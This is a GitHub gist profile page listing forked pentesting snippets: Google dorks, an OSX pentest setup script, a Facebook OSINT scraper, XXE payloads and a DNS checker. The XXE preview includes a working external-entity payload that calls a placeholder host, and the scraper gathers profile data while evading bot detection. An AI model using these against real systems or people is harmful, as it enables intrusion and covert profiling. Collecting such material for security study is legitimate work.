Skip to content

Instantly share code, notes, and snippets.

View R3dFruitRollUp's full-sized avatar

Александр R3dFruitRollUp

View GitHub Profile
@R3dFruitRollUp
R3dFruitRollUp / google-dorks
Created December 31, 2018 00:56 — forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
### Keybase proof
I hereby claim:
* I am r3dfruitrollup on github.
* I am r3dfruitrollup (https://keybase.io/r3dfruitrollup) on keybase.
* I have a public key ASAc7kG0e4w22ZOS635OUC5fXYcr3HgG5aDLzdKGS7vsywo
To claim this, I am signing this object:
@R3dFruitRollUp
R3dFruitRollUp / google-dorks
Created March 31, 2018 16:16 — forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@R3dFruitRollUp
R3dFruitRollUp / google-dorks
Created March 31, 2018 16:16 — forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@R3dFruitRollUp
R3dFruitRollUp / osx-for-pentesting.sh
Created January 27, 2018 14:38 — forked from gabemarshall/osx-for-pentesting.sh
A fork of osx-for-hackers for my personal pentesting setup preferences
# OSX for Pentesting (Mavericks/Yosemite)
#
# A fork of OSX for Hackers (Original Source: https://gist.github.com/brandonb927/3195465)
#!/bin/sh
# Ask for the administrator password upfront
echo "Have you read through the script prior to running this? (y or n)"
read bcareful
@R3dFruitRollUp
R3dFruitRollUp / osx-for-pentesting.sh
Created January 27, 2018 14:38 — forked from gabemarshall/osx-for-pentesting.sh
A fork of osx-for-hackers for my personal pentesting setup preferences
# OSX for Pentesting (Mavericks/Yosemite)
#
# A fork of OSX for Hackers (Original Source: https://gist.github.com/brandonb927/3195465)
#!/bin/sh
# Ask for the administrator password upfront
echo "Have you read through the script prior to running this? (y or n)"
read bcareful
@R3dFruitRollUp
R3dFruitRollUp / fb_osint.py
Created December 9, 2017 17:00 — forked from Chan9390/fb_osint.py
OSINT using Facebook alt text
import requests
from bs4 import BeautifulSoup as bs
profile = "https://www.facebook.com/<profile_name>"
headers = {
'accept':'*/*',
'accept-language':'en-US,en;q=0.8',
'User-Agent': 'Put any authentic header here. If not, facebook can understand this is bot script and the details will be striped',
'referer':profile
@R3dFruitRollUp
R3dFruitRollUp / XXE_payloads
Created December 9, 2017 16:35 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
# Usage: ./dns_check.py <list_of_domain_names.txt>
import dns.resolver
import requests
import re
import json
import sys
resolver = dns.resolver.Resolver()
resolver.timeout = 5
resolver.lifetime = 5